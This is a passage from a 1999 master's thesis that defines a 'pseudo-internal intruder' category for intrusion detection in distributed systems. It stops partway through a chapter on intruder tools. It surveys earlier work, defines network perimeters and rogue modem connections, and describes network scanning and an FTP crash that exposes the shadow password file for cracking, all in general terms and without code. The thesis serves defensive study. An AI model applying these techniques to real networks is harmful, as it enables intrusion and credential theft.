Full Text (Word97) - University of Virginia
advertisement
The Pseudo-Internal Intruder: A New Access Oriented Intruder Category A Thesis Presented to The Faculty of the School of Engineering and Applied Science University of Virginia In Partial Fulfillment of the Requirements for the Degree Master of Science (Computer Science) By Brownell Kerr Combs May 1999 The Pseudo-Internal Intruder ii Approval Sheet This thesis is submitted in partial fulfillment of the requirements for the degree of Master of Science (Computer Science) ______________________________________________________ Author’s Name This thesis has been read and approved by the Examining Committee: ______________________________________________________ Thesis Advisor ______________________________________________________ Committee Chairman ______________________________________________________ Accepted for the School of Engineering and Applied Science: ______________________________________________________ Dean, School of Engineering and Applied Science May, 1999 The Pseudo-Internal Intruder iii Abstract Intruders attack both commercial and federal distributed systems frequently, and often successfully. The problem of intruders has become critical. The most effective defense today is the use of intrusion detection systems, because it is widely considered to be impossible to build complicated distributed systems that completely prevent unauthorized intrusions. Since 1980 the intrusion detection community has divided intruders into two categories based on the intruder’s access to a system. Internal intruders have legitimate access through user accounts; external intruders break into a system without benefit of a user account. The proliferation of distributed systems with complex networks has necessitated a reexamination of intruder definitions. When the notion of internal and external intruders was defined, systems were largely stand-alone computers – typically contained in a single area sometimes with remote peripherals. Today computers are part of networked, distributed systems that may span multiple buildings sometimes located thousands of miles apart. The network of such a system is a pathway for communication between the computers in the distributed system. The network is also a pathway for intrusion. We define a new category, the pseudo-internal intruder. This new category encompasses intruders without user accounts who circumvent the perimeter defenses of a modern distributed system and attack the system via its network. In contrast, external intruders attack a system from the outside through a system’s perimeter defenses. Having a pseudo-internal category is useful because it gives the intrusion detection community a framework in which to clearly describe the capabilities of the pseudo-internal intruder, defend against the pseudo-internal intruder, and develop techniques for detecting the pseudo-internal intruder. The Pseudo-Internal Intruder iv Acknowledgments I would like to thank my advisor, Dr. Anita Jones, not only for her guidance and support during the thesis process, but her help and advice with my career. I would also like to thank Bob Sielken for thought provoking discussions on the topic of intruders, Andy Lowe for help with the case study network and technical proofreading, Chris Milner for advice on numerous tasks around the department, and Peggy Reed for always being willing to lend a hand. I also appreciate the flexibility of my employers at SAIC, Robert Schlansker, Dave Carothers, and William Baugh, in allowing me to split time between work and school. Thanks and love to Melissa Meehan and Craig Hille for their support and making my time in Charlottesville much more enjoyable. Lastly, I send my love and appreciation to my mother, father, and stepfather for all of their support and unconditional love since I departed for boarding school some 9 years ago. I could never have achieved this without you. The Pseudo-Internal Intruder v Table of Contents APPROVAL SHEET ...................................................................................................................................II ABSTRACT ................................................................................................................................................ III ACKNOWLEDGMENTS.......................................................................................................................... IV TABLE OF CONTENTS ............................................................................................................................. V FIGURES .................................................................................................................................................... VI TABLES ..................................................................................................................................................... VII CHAPTER 1: THE PSEUDO-INTERNAL INTRUDER ..........................................................................1 1.1 1.2 1.3 1.4 1.5 1.6 INTRODUCTION.................................................................................................................................1 LITERATURE SURVEY .......................................................................................................................2 APPROACHES TO CATEGORIZING INTRUDERS ...................................................................................6 DEFINITIONS .................................................................................................................................. 10 A NEW ACCESS ORIENTED INTRUDER CATEGORY ......................................................................... 18 THE PSEUDO-INTERNAL INTRUDER: A DISTINCT CATEGORY? ....................................................... 21 CHAPTER 2: CAPABILITIES OF THE PSEUDO-INTERNAL INTRUDER .................................... 24 2.1 2.2 TOOLS AND TECHNIQUES USED BY THE PSEUDO-INTERNAL INTRUDER ......................................... 24 DANGERS OF THE PSEUDO-INTERNAL INTRUDER ........................................................................... 31 CHAPTER 3: SECURITY RECOMMENDATIONS .............................................................................. 39 3.1 3.2 3.3 3.4 DEFENDING SYSTEMS AGAINST THE PSEUDO-INTERNAL INTRUDER .............................................. 39 DEFENDING THE DISTRIBUTED SYSTEM: PREVENTING INTRUDER ACCESS .................................... 43 DEFENDING THE DISTRIBUTED SYSTEM: MITIGATING INTRUDER ACCESS ..................................... 46 DEFENDING THE DISTRIBUTED SYSTEM: DETECTING INTRUDER ACCESS ...................................... 49 CHAPTER 4: CASE STUDY ..................................................................................................................... 52 4.1 4.2 4.3 4.4 4.5 4.6 4.7 4.8 INTRODUCTION............................................................................................................................... 52 THE TARGET SYSTEM..................................................................................................................... 53 THE PSEUDO-INTERNAL INTRUDER ATTACKS ................................................................................ 57 EXPECTED RESULTS ....................................................................................................................... 59 RESULTS OF ATTACKS ON TARGET SYSTEM – PHASE 1 .................................................................. 60 SECURITY CHANGES MADE TO TESTBED SYSTEM FOR PHASE 2 ..................................................... 65 RESULTS OF ATTACKS ON TARGET SYSTEM – PHASE 2 .................................................................. 68 SUMMARY ...................................................................................................................................... 72 CHAPTER 5: CONCLUSIONS AND FUTURE WORK ........................................................................ 75 5.1 5.3 CONCLUSIONS ................................................................................................................................ 75 FUTURE WORK ............................................................................................................................... 76 REFERENCES ............................................................................................................................................ 77 The Pseudo-Internal Intruder vi Figures FIGURE 1-1: PHYSICAL CONFIGURATION OF EXAMPLE NETWORK ..................................... 12 FIGURE 1-2: NETWORK CONFIGURATION OF SAME NETWORK FROM FIGURE 1-1 ......... 17 FIGURE 1-3: BOX DIAGRAM OF INTRUDER CATEGORIES ......................................................... 19 FIGURE 2-1: IPV4 PACKET HEADER .................................................................................................. 25 FIGURE 4-1: NETWORK CONFIGURATION OF PHASE 1 TESTBED SYSTEM.......................... 55 FIGURE 4-2: NETWORK CONFIGURATION OF PHASE 2 TESTBED SYSTEM.......................... 67 The Pseudo-Internal Intruder vii Tables TABLE 4-1: NODES IN TESTBED DISTRIBUTED SYSTEM............................................................. 53 The Pseudo-Internal Intruder Chapter 1: The Pseudo-Internal Intruder 1.1 Introduction Each day intruders attack numerous distributed systems. A 1996 report estimated that Department of Defense systems alone are attacked on average over 680 times per day [GAO96]. The report further estimated that as many as 65 percent of those attacks were successful in gaining access to sensitive information. More than 99 percent of all respondents reported at least one security incident in one recent survey [Pow99], while 78 percent of organizations responding to a 1996 survey reported financial loss from security breaches [DV97]. The Computer Emergency Response Team (CERT) annual reports show a 67 percent increase in security incidents handled annually by CERT from 1994 to 1998 [CER94, CER98]. The problem of successful intrusions is not expected to end any time soon. Most experts believe that it is not practically possible to build a complex distributed system that is completely secure. Even if some new development allowed such a system to be created, the vast installed base of vulnerable systems would guarantee a lengthy transition period during which intrusions would still occur [Sun96]. For these reasons security experts advocate the use of intrusion detection systems. Developers of intrusion detection systems, and those responsible for network security of distributed systems, face the difficult task of defending against an ever changing set of potential intrusions. Each day new attack tools and techniques are developed and it is increasingly difficult for system administrators and intrusion detection system developers to stay ahead of malicious computer users (witness the recent success The Pseudo-Internal Intruder 2 of the Melissa e-mail virus [CNN99]). Any framework that helps such administrators and developers to understand and classify potential intruders is useful in the struggle to protect distributed systems. Chapter 1 of the thesis introduces the topic of intruder categories, describes the evolution of intruder categories, and defines important terms and explains aspects of network security that are required to discuss the pseudo-internal intruder. Chapter 1 concludes with a definition and explanation of the pseudo-internal intruder as a new and distinct access oriented intruder category. Chapter 2 lists the tools and techniques available to pseudo-internal intruders and the threat represented by such intruders. Two example intrusion scenarios illustrate the threat of the pseudo-internal intruder. Chapter 3 describes an overall strategy that can be used to defend distributed systems against pseudo-internal intruders. Chapter 4 contains the results of a case study illustrating the effectiveness of the defensive strategy outlined in chapter 3. Chapter 5 contains the conclusions of the thesis and speculates on interesting future work. 1.2 Literature Survey In 1980 J.P. Anderson introduced the concept of intrusion detection [And80]. Anderson proposed a “security surveillance system” involving formal examination of a system’s audit logs. In examining the system threats, Anderson also introduced the notion of categorizing intruders based upon their access to a system. He noted that in “considering the threat problem, the principle breakdown of threats is on the basis of whether or not an attacker is normally authorized to use the computer system.” Internal intruders were defined as those with permissions to access the system and external The Pseudo-Internal Intruder 3 intruders were those without any permissions. Therefore the external intruder category included not only outsiders from other organizations, but anyone with physical proximity to the computer system, but without user access to the computer system. It is important to note that when Anderson wrote his report there were very few distributed systems. In fact, the report that introduced the concepts of intrusion detection and access oriented intruder categories was an actual study of a customer’s single computer system, “the purpose of which was to improve… computer security…” Therefore, it is easy to see why Anderson chose not to differentiate between outsiders and those with physical access, but without authorized user access to the computer system. Whether through tapping wire communication (outsider) or physical access to a terminal (employee without permissions) the best that either could achieve was a login prompt. Both groups of intruders had to deal with the same technical barrier: the system’s access control security measures. By the mid 1980s the landscape was, however, changing. Distributed systems were becoming predominant over single computer systems. That change started a debate in the network security field as to what changes should be made to existing security principles to adapt them to distributed systems. In 1985 Anderson claimed that “network security issues can be handled with the same concepts that apply to single computer systems” [And85]. Anderson’s opinion appeared to be in the minority. Nessett argued that “a strong case [could] be made that distributed systems admit important security issues that either are not applicable to stand-alone systems or are assumed to be rarely relevant… [Such] issues add extra dimensions to the distributed system security problem and invalidate The Pseudo-Internal Intruder 4 attempts to simply extend existing concepts into the area of distributed system security” [Nes87]. Others pointed out that any protection mechanism residing in a single computer becomes insufficient when a computer is connected to a network because those mechanisms cannot protect the security of communication across the network [LS90]. Such distributed systems require a security enforcement mechanism for the network in addition to any mechanisms residing on single machines [LS90]. There was, however, no dispute that both stand alone and distributed systems needed real time intrusion detection. In her paper introducing a new intrusion detection model, Denning argued that “developing systems that are absolutely secure is extremely difficult, if not generally impossible. [Additionally], even the most secure systems are vulnerable to abuse by insiders who misuse their privileges” [Den87]. Denning’s model of intrusion detection was an adaptation of Anderson’s original idea of utilizing audit logs for intrusion detection. Since “exploitation of a system’s vulnerabilities involves abnormal use of the system,” intrusions can be detected by monitoring audit logs and other indicators for abnormal patterns of system usage [Den87]. Denning’s model of intrusion detection is considered to be the beginning of the second generation of intrusion detection which was more statistically sophisticated, addressed distributed systems, and provided some real time alerts [JS99]. This second generation of intrusion detection systems is divided into two approaches: anomaly detection and misuse detection. Intrusion detection systems based on anomaly detection characterize the correct behavior of a system and then detect wrongful changes to that correct behavior. Misuse detection systems characterize known ways to penetrate a system and then monitor for those misuse characterizations to appear. This progression The Pseudo-Internal Intruder 5 of intrusion detection can be more closely followed in a number of recent surveys of intrusion detection techniques and products [CH96, Lun93, Sun96, JS99]. A majority of intrusion detection experts currently believe that the best intrusion detection system will contain both anomaly detection and misuse detection mechanisms. One such intrusion detection system that includes both anomaly detection and misuse detection mechanisms is the Next-generation Intrusion Detection Expert System (NIDES) [AFV95]. NIDES contains a statistically dynamic anomaly detector to catch internal intruders masquerading as legitimate users. A profile consisting of more than 30 different criteria (such as CPU usage and typical amounts of input and output) is maintained for each user. User actions are matched against that individual’s profile and “when the observed activity departs from established patterns of use for an individual” alarms are raised by the intrusion detection system [SRI97]. The mechanism is statistically dynamic (as opposed to static) since NIDES adapts each user’s profile over time. If a user’s habits change slowly over time, the profile will be adapted to the new behavior without raising alarms. Profiles can also be created for workstations, remote hosts, groups of users, or particular application programs [JS99]. NIDES also contains an expert system misuse detection to “detect attempts to exploit known security vulnerabilities of the monitored systems and intruders who exhibit specific patterns of behavior that are known to be suspicious or in violation of site security policy” [SRI97]. NIDES observes the system and compares its observations to a rule database of known intrusion scenarios and attack patterns. The security experts that created NIDES initially constructed the rule database, but the system administrator of the system NIDES is protecting can customize the database. The Pseudo-Internal Intruder 6 Even though it is accepted that distributed systems require different security mechanisms than stand-alone systems, the intruder categories defined for stand-alone systems are still in use. Many modern intrusion detection system research papers still describe the threat of intruders as non-authorized (external) and authorized (internal) users [IKP95]. Recall that in Anderson’s seminal paper he only evaluated the threat of an intruder with respect to whether the intruder had authorized user access to the computer. As discussed, this made perfect sense when considering a stand alone computer. But with the proliferation of the distributed system, this way of categorizing intruders should be reexamined for distributed systems in a manner similar to the reexamination of security concepts. 1.3 Approaches to Categorizing Intruders There are two main approaches to classifying intruders. The first is to simply separate intruders into categories based on their access to a system. An example of this approach is the previously discussed traditional pair of categories: external and internal intruders [And80]. The external intruder is an outsider who has no authorized access to the system and must gain access by compromising the system’s security. The internal intruder is one who already has limited access to the system through an authorized user account. An internal intruder can either be a legitimate user or an outsider who is successfully masquerading as a legitimate user. The second approach categorizes intruders not by access to a system, but by the method of attack used by the intruder. One example of such an approach divides all attacks into three modes: outside, within, and below [Neu98]. Attacks from the outside The Pseudo-Internal Intruder 7 come from above or laterally at the same abstraction level. These types of attacks can be unprivileged intrusions where a security flaw was exploited to allow access with no authorization required. Attacks from within are obtained with the privileges of the given level. That is, the attack originates from a privileged user or an outsider successfully masquerading as a privileged user (through password cracking, etc). Attacks from below are at a lower layer of abstraction. These attacks are either hardware or operating system based and can require some unusual physical access to the system. One example of this type of attack would be connecting a hardware sniffer to the network to gather information. Both approaches have their disadvantages with respect to their use in describing intruders. The traditional access oriented approach of splitting all intruders into external and internal categories is too simplistic since it was originally designed for solitary machines where everyone either did (internal) or did not (external) have a user account on that machine. When one replaces the solitary machine with a distributed system, the issue of defining an intruder’s access becomes much more complicated. Distributed systems can have multiple levels of users on multiple machines, complex trust relationships between machines, the network infrastructure connecting the machines, and quite often connections to other uncontrolled networks (even including the Internet). Compare the complexity illustrated above to a solitary machine with a single operating system where each individual is either a user or a non-user without an account, and the increased vulnerabilities become obvious. The nature of the more complicated distributed system introduces many new vulnerabilities and ways in which an intruder might access the system. It is often stated The Pseudo-Internal Intruder 8 by experts that system security for distributed systems is fundamentally more complex than it is for stand-alone systems [Nes87]. Therefore extending security concepts developed for stand-alone systems to distributed systems is often not practical [Nes87]. Yet many continue to use only the traditional internal and external access oriented categories, even though it is clear that the transition to networked systems has increased the kinds of access to a distributed system as well as the possible range and complexity of attacks that intruders might attempt. When considering access to a distributed system, defining an intruder as either external or internal has become an ambiguous definition. Since neither has a user account, a janitor damaging network equipment or an Internet hacker attempting to break through a firewall are each considered external intruders. The problem is that in a distributed system the external and internal categories include so many kinds of access to the system that referring to an intruder as either of the categories is no longer distinctive enough. Attack oriented categorization can also present an ambiguity problem, but one of a different type. The problem is that a single intruder can often attempt attacks from more than one category (outside, within, and below). An example of such ambiguity would be an authorized user on a UNIX machine (internal intruder) running a software sniffer (attack from below), exploiting a FTP bug (attack from within), or using that machine’s privileges to gain access to other machines (security/logic flaw, attack from outside). If the system administrator only knows that just one of these attacks occurred it may be difficult to determine the source of the attack. Depending on a machine’s configuration, it is sometimes possible that both authorized users of the machine and nonusers connected to the machine can exploit certain FTP bugs to gain root access. If no The Pseudo-Internal Intruder 9 effort is made to identify the type of access, but only the type of attack, the system administrator of the above machine will not know whether the machine was hacked from the outside or if the intruder is internal, i.e. an authorized user. So while the attack oriented approach may be useful for some purposes, it is not the best choice to unambiguously define intruders. The most effective approach to categorizing intruders is to modify the existing access oriented approach to account for the complications of distributed systems and all that has been learned through examinations of attack methods such as the attack oriented categorization approach. In order to discuss intruders in unambiguous terms this modification of the traditional access oriented categorization must seek to create more numerous, but distinct, access oriented categories. The access oriented approach will become less ambiguous as categories are added, while the addition of categories to the attack oriented approach will not change the fact that a given intruder can launch attacks from more than one category. To this end we define and analyze a new distinct category of intruder. The pseudo-internal intruder is the intruder who has the system access to launch many of the attacks that did not exist prior to distributed systems and which are difficult for external or internal intruders to utilize. The end result of defining the pseudo-internal intruder will be a framework in which the scientific intrusion detection community can clearly describe the capabilities of the pseudo-internal intruder, develop techniques for detecting the pseudo-internal intruder, and consider defenses against the pseudo-internal intruder. The Pseudo-Internal Intruder 10 1.4 Definitions Without clear definitions it would be impossible to adequately convey the different types of access to and within a system. Since this thesis defines intruders based on their access, it is important to have these precise definitions for most aspects of a typical distributed system environment. A distributed system is an interconnection of two or more computers over a network. Modern distributed systems often contain many more than two computers as well as other hardware devices that facilitate digital communication, network maintenance, and security. The network is the backbone used by elements of a distributed system to communicate. Since most distributed systems interface with other distributed systems or the Internet, a particular distributed system’s network will sometimes be referred to as an internal network to distinguish it from other networks. It is important to note that our definition of a distributed system is different than the classic definition of a distributed system. For the purpose of this thesis, we are including systems that some would consider networked systems into our definition of a distributed system. We are also assuming that any distributed system is reasonably setup with respect to functionality and security. There is little point in discussing distributed systems with no network traffic at all (no functionality) or no defenses to protect it from intruders (no security measures). Each distributed system has an owner that is the single administrational and operational authority. The owner has the ultimate responsibility of maintaining the distributed system. Owners of large distributed systems often designate operational authority over all or parts of the system to system administrators who adhere to both a The Pseudo-Internal Intruder 11 functionality policy and a security policy. The owner of the system creates both policies. A functionality policy dictates what purpose a distributed system is supposed to serve. A security policy states what security measures are to be used in a distributed system. When combined, these two policies control the balance between functionality and security (i.e. additional security is usually at the cost of functionality). Each network contains network devices that facilitate communication between machines by managing and directing the flow of packets of information bound from one machine to another. For our purposes we will divide network devices into two types: routers and hubs. Routers are network devices that selectively forward packets based upon the intended destination of the packet. For example, if a router has three choices of directions to forward a packet, it will only forward the packet in directions of intended recipients (instead of all three directions). Hubs are network devices that forward packets without selectivity. A hub forwards each packet to every device connected to the hub. Every distributed system has a physical configuration that includes all of the hardware used in the distributed system as well as the location of each hardware item. This not only includes computers, but peripherals like printers and scanners, network devices such as routers and hubs, as well as all networking cable. In short, anything that is connected to the internal network of a distributed system, including the hardware that constitutes the interconnections, is part of its physical configuration. The physical configuration can be geographically represented on a three dimensional map based upon the physical location of all the hardware. The physical perimeter of a distributed system is a three dimensional geographic boundary such that no hardware item of the physical configuration is outside the The Pseudo-Internal Intruder 12 boundary. With the exception of hardware items used to create a connection with a system outside the physical perimeter, all of the physical elements of the entire distributed system are inside the physical perimeter. Such hardware items used to make connections with other systems can reside on the physical perimeter, but never outside it. Physical perimeter defenses protect the hardware items of the physical configuration from unauthorized access. These defenses are designed to prevent unauthorized persons from ever crossing the physical perimeter. Examples of physical perimeter defenses include guards, fences, locked doors, and even lead shielding around cables. Figure 1-1: Physical Configuration of Example Network Figure 1-1 shows the physical configuration of an example distributed system that is connected to the Internet and one other external distributed system. All of this distributed system’s hardware is surrounded by the physical perimeter. The internal network consists of several network devices (a router and two hubs), four machines, and The Pseudo-Internal Intruder 13 a printer. One of the machines is connected to a modem, but the modem is not yet connected to a phone line. It is useful to define distributed systems to have a network configuration that is a representation of how all elements of the physical configuration are connected and interact with each other. When drawn graphically, it shows the digital pathways connecting each piece of hardware (a node) in the physical configuration, but does not show physical size, distance, or geographic location. Since the network configuration also specifies the ways in which the elements of the configuration use the pathways to communicate with each other, network protocol stacks and segmentations of a network are aspects of the network configuration. A network protocol is a definition of how two or more nodes on the network will communicate [Tan96]. A network protocol stack is a collection of network protocols chosen by the system administrator to be used in a particular distributed system [Tan96]. A segment of a network is a collection of elements that only receive network traffic intended for one of the nodes in the segment. The network perimeter is the separation between a distributed system’s internal network and the outside world. The outside world to any given distributed system is anything outside either its physical or network perimeter. Similar to the physical perimeter, the network perimeter encompasses all nodes and digital pathways of the internal network. The network perimeter does, however, not exist in physical space like the physical perimeter. The network perimeter is merely a conceptual boundary separating the internal network from all other networks (anything in the outside world). The physical perimeter encompasses the actual physical location of each hardware component in the physical configuration. The Pseudo-Internal Intruder 14 A network perimeter defense is anything at the outside connects that serves to detect and prevent unauthorized access to the distributed system. An outside connect is a point on the network perimeter that allows two-way communication between the distributed system and the outside world. There are three different types of network perimeter defenses: firewalls, audit tools, and authentication packages. Firewalls are software packages or pieces of hardware that limit the network traffic passing through the network perimeter into the internal network of a distributed system. The restrictions on network traffic can range from letting nothing at all through to letting virtually all traffic into the internal network. The restrictions are set based upon the requirements of a distributed system’s functionality and security policies. For example, if the owner of a distributed system decides to host web pages than can be seen by users of the Internet then at least certain traffic related to that web service must be let through the firewall. Audit tools record all or part of the network traffic activity observed by the tool. The amount and kinds of traffic recorded are dictated by the functionality and security policies of the distributed system in question. An audit tool might be programmed to record all communication originating from outside the network perimeter, but not communications originating from inside the network perimeter. System administrators of large distributed systems must often limit the information recorded by audit tools because the sheer volume of all traffic would require large amounts of disk storage that are not practical. Authentication packages control access to a distributed system’s internal network from outside the network perimeter through user accounts and passwords. Owners of a distributed system can allow authorized users that are located outside of the network The Pseudo-Internal Intruder 15 perimeter a higher level of access. Authenticating the identity of the person attempting to connect to the internal network securely allows this higher level of access for particular users. The process is very similar to logging into a network from inside the network perimeter. There is also a unique case of an outside connect that needs to be defined. The rogue outside connect is an outside connect which exists unbeknownst to the owner of the distributed system that it connects to the outside world. Rogue outside connects are elements of the network configuration, but are not in the owner’s perception of the current network configuration of a distributed system. This means that they cannot be assumed to have any of the network perimeter defense mechanisms usually associated with outside connects. The most likely way for a rogue outside connect to occur is when unauthorized hardware becomes part of the physical configuration without the knowledge or permission of the system administrators. One example would be if an employee brought a modem to work and connected it to their desktop computer. If that desktop computer is connected to the network then it is a part of the system’s physical configuration and a node of the network configuration. Attaching a new piece of hardware to the computer, like the modem, is adding a new piece of hardware to the physical configuration. Connecting a phone line to that hardware item (the modem) already connected to the network creates an outside connect. The modem would allow someone from outside the network perimeter of the system to dial into the modem and gain access to the network through the computer the modem is attached to. Since system administrators are unaware The Pseudo-Internal Intruder 16 of this outside connect, the desktop computer does not have the appropriate network perimeter defenses. Another example of a potential rogue outside connect can be created by an unauthorized or misconfigured remote network management device. An administrator must manage network devices like hubs and routers by reconfiguring them as changes are made to a system’s network configuration. This management of network devices is normally done from a remote location like a central network operations center. Remote network management devices allow communication between a network device and a remote system administrator. The most common example of a remote network management device is a modem connected to a particular network device like a router. Since communication between the management device and the remote manager is not done through the normal pathways of digital communication in the distributed system, remote network management devices require an entirely different set of security features as opposed to normal network perimeter defenses. If a remote network management device has been installed without the knowledge of the system administrators, then these special network perimeter defenses have not been set up. Therefore, the remote network management device would be a rogue outside connect. The Pseudo-Internal Intruder 17 Figure 1-2: Network Configuration of Same Network from Figure 1-1 Figure 1-2 shows a network configuration of the same sample distributed system from figure 1-1. Notice how different the physical and network configurations can appear since one is based on the physical location of hardware and the other is not. The internal network is surrounded by a network perimeter separating the internal network from the outside world. The Internet and the other distributed system are connected to the internal network by an outside connect that is guarded by a firewall. Also notice that the modem has now been connected to an outside telephone line. Assuming that the system administrators do not know about the modem, that connection forms a rogue outside connect. The Pseudo-Internal Intruder 18 1.5 A New Access Oriented Intruder Category As has been discussed, the problem with having only two categories is that intruders with varying degrees of access to a system are combined into the same category. When the concept of internal and external intruders was defined in 1980 systems were largely stand-alone computers. Therefore, those concerned with intrusions were mainly focused on the damage rogue users could do (internal intruders). Not only was it difficult for an external intruder to gain access to a single guarded room, but there was little such an intruder could do without a user account. In fact, there was such focus over internal intruders that the internal intruder category was further broken up into three subcategories (masquerading, clandestine, and legitimate) while the external category was basically defined as ‘anything not internal’ [And80]. Today most systems are large distributed systems running over complex networks. Such a change from stand-alone systems to networked, distributed systems necessitates a reexamination of categorizing intruders. The scientific intrusion detection community must consider the differences between a traditional external intruder attacking a system from outside the network perimeter and one attacking the system from inside the network perimeter. This thesis will examine these traditionally external intruders who have access inside the network perimeter of a distributed system, but do not have any of the privileges granted to authorized users. These intruders are called pseudo-internal intruders. The Pseudo-Internal Intruder 19 Figure 1-3: Box Diagram of Intruder Categories The pseudo-internal intruder is an intruder who has circumvented network perimeter defenses and gained access to the network of a distributed system without utilizing any user accounts. The primary difference between the pseudo-internal intruder and the external intruder is that the pseudo-internal intruder has completely bypassed, not broken through, any network perimeter defenses. Therefore system administrators relying solely upon network perimeter defenses to notify them of intrusions will have no knowledge of the existence of a pseudo-internal intruder. A pseudo-internal intruder must gain access to a distributed system’s network without using an outside connect since all outside connects are monitored by network perimeter defenses (i.e. the intruder must get inside the network perimeter without encountering network perimeter defenses). There are two ways to gain this unique type of access: either by violating the physical perimeter to get physical access to the hardware of the distributed system or by accessing the network configuration through a rogue outside connect. Recall that because the existence of a rogue outside connect is not known by a system’s owners, it is not monitored by any of the network perimeter defenses normally used to guard outside connects. Therefore, as far as system security is The Pseudo-Internal Intruder 20 concerned, an intruder accessing the system through a rouge outside connect is, in effect, inside the network perimeter. Using a rogue outside connect does not require the intruder to violate the physical perimeter since the rogue outside connect could be the result of system administrator misconfiguration or users of the system not following security policy. In such cases the pseudo-internal intruder could gain knowledge and use of the rogue outside connect without ever violating physical security to create that rogue outside connect. Based on these two means of access pseudo-internal intruders can be divided into two sub-groups: intruders with physical access to some part of a distributed system’s physical configuration, and intruders with access to a rogue outside connect. The first sub-group is made up of both insiders and outsiders. Insiders are those who by virtue of an association with the owner of a distributed system can personally cross the physical perimeter. Insiders could have access to a wiring closet or perhaps just have a networked computer on their desk. Examples of insiders are system administrators, users of the system, support and cleaning staff, physical security personnel, or even contractors working inside the physical perimeter. Outsiders are intruders who gain their access to the distributed system’s physical configuration by violating the physical perimeter through either subterfuge or force. An example of subterfuge might be an outsider illicitly crossing the physical perimeter by posing as a legitimate insider. Or the outsider may choose to use force and break through the physical perimeter by simply breaking into a building. The second sub-group, those that use rogue outside connects, can avoid having to contend with any physical perimeter defenses. Note that a rogue outside connect would The Pseudo-Internal Intruder 21 not include normal dialup or Internet access that passes through any authentication system. Remember that the key aspect of rogue outside connects is that they do not pass through any network perimeter defense mechanisms that might log identity (no user logins) or prevent access. Although an intruder may be dialing in to an unauthorized modem from a location outside the physical perimeter, the access gained is the equivalent of being inside the network perimeter of the system. 1.6 The Pseudo-Internal Intruder: A Distinct Category? Any newly proposed access oriented intruder category must be examined to determine if it is truly distinct from the traditional internal and external categories, or merely a sub-group of an existing category. At first, it intuitively seems that a pseudointernal intruder might be a sub-group of the internal intruder category. Since such an intruder is inside the network perimeter of the system is certainly seems that they are more ‘internal’ than ‘external’. One must remember, however, that the fundamental definition for an internal intruder has always been an intruder who has at least limited user privileges in the system. Next, consider whether it makes more sense to define pseudo-internal intruders as a sub-group of external intruders. Problems arise with this approach. The first is that the access of pseudo-internal intruders allows them to launch attacks that are unavailable to any intruder faced with network perimeter defenses such as an Internet hacker (the most infamous type of external intruder). While other differences between pseudo-internal intruders and those intruders outside of the network perimeter will be explained later in the thesis, it is sufficient to note one such difference here to illustrate why the attacks are The Pseudo-Internal Intruder 22 so dissimilar. It is very difficult to attack a state-of-the-art distributed system from outside the perimeter and not be detected irregardless of the success of the attack. An unsuccessful attack on a distributed system will leave evidence in the audit logs since audit tools would record the network traffic involved in the attack. Since an unsuccessful intruder never gains access, the intruder has no chance to influence the audit tool to prevent it from reporting the attack. Even if an external intruder is successful in gaining access to a distributed system it is likely that audit tools will record the successful attack. Several recent audit tools are constructed to observe and record the contents of incoming traffic without interacting with the rest of the internal network [ODS98]. Even an intruder that is successful in breaking through network perimeter defenses may be recorded by an audit tool that the intruder has no way of interacting with to delete any evidence of an intrusion. Even older audit tools are designed so that it is difficult to remove particular information from audit logs without deleting the entire log (i.e. absence of any audit log will serve as evidence of an intrusion). This problem of being detected regardless of whether the intruder gains control of a machine or not is not something that affects the pseudo-internal intruder. Considering the differences in access to a distributed system, making pseudointernal intruders a sub-group of external intruders would make calling an intruder ‘external’ an ambiguous statement. For example, such a combination would make an ‘external intruder’ be both an Internet-based hacker and an employee passively harvesting information from inside the perimeter. Not only does this make the phrase ‘external intruder’ potentially ambiguous, it doesn’t make sense. As has been discussed above, the access of the pseudo-internal intruder is not external to the system at all. The Pseudo-Internal Intruder 23 While the unique access of the pseudo-internal intruder is not equivalent to that of either a traditional internal or external intruder, it is definitely closer to being internal. Hence, the name pseudo-internal and not pseudo-external. Due to the pseudo-internal intruder’s lack of user privileges and dissimilarities with other traditional external intruders, it is a distinct access oriented category and not a sub-group of one of the two existing categories. Our real motivation for carefully defining this new category is because it can be the basis for better understanding of, defense against, and detection of the pseudo-internal intruder. The following section will describe the unique tools and techniques and the behaviors of the pseudo-internal intruder. Example scenarios of theoretical pseudointernal intruders will help to illustrate the dangers to a distributed system represented by such intruders. Later sections will describe ways of detecting and defending against the pseudo-internal intruder. The Pseudo-Internal Intruder 24 Chapter 2: Capabilities of the Pseudo-Internal Intruder 2.1 Tools and Techniques Used by the Pseudo-Internal Intruder The unique aspect of the pseudo-internal intruder category is access to the internal network from inside the network perimeter. It has been pointed out that accessing the network of a distributed system from inside the network perimeter allows pseudo-internal intruders to avoid the auditing and security measures of network perimeter defenses. But what does this mean with respect to a distributed system’s security? What can a pseudointernal intruder do that makes him or her such a unique threat? It is helpful to first review the tools and techniques that pseudo-internal intruders can utilize prior to explaining the threat and behavior of such intruders. Familiarity with these tools will lead to a better understanding of such threats since many of the unique abilities of pseudo-internal intruders derive from the ability to use such tools in ways that no other kind of intruder can. There are four kinds of tools and techniques that pseudo-internal intruders can use: network assessment tools, packet sniffers, exploits (that do not require user accounts), and denial of service attacks. 1. Network assessment tools gather information about the network configuration and report on potential vulnerabilities of a distributed system. In passive mode, these tools gather network configuration information by examining the packets passing the assessment tool’s location on the network. Each packet has a header that contains certain information about the packet depending on the protocol stack in use in a distributed system. For example, the header for an IPv4 packet (figure 2-1) contains the source and destination of the packet, the relative age of the packet, and the type of service the packet desires from the network. IPv4 packets may also contain the security level of the packet, The Pseudo-Internal Intruder 25 the path that the source wanted the packet to follow, the path that the packet actually followed, and a timestamp from each router the packet traversed. Figure 2-1: Ipv4 Packet Header [Tan96] Network assessment tools correlate the information gathered from observing packet headers and can build a picture of a distributed system’s network configuration. This picture can include not only the routes between nodes in the network configuration, but details like which nodes send and receive the most traffic, and what services the traffic is being directed to (FTP, HTTP, Telnet, etc.). In active mode, network assessment tools not only examine passing packets, but send out queries over the network. These queries attempt to identify the presence and type of any device on the network. Most network assessment tools contain databases of vulnerabilities per operating system and network service. Once the tool finds evidence that indicates some device it is scanning may have one of the vulnerabilities in its database, the tool reports this fact to the pseudo-internal intruder. Some tools also explain how the vulnerability could be exploited. For example, the network assessment tool may send a request to use the FTP service on a targeted machine. The version The Pseudo-Internal Intruder 26 number of the FTP service available on the targeted device is then checked against the tool’s internal list of FTP versions that contain known vulnerabilities. Perhaps the targeted device is running one of the FTP versions that are susceptible to an attack where anonymous users can crash the service and retrieve the shadow password file from the core dump created by the crash. The shadow password file could then be cracked to recover user account names and associated passwords on the target machine. In addition to any information gained from packet headers, all of the FTP vulnerability information would be reported to the pseudo-internal intruder using the network assessment tool. 2. Packet sniffers record each packet that passes by the sniffer’s location on the 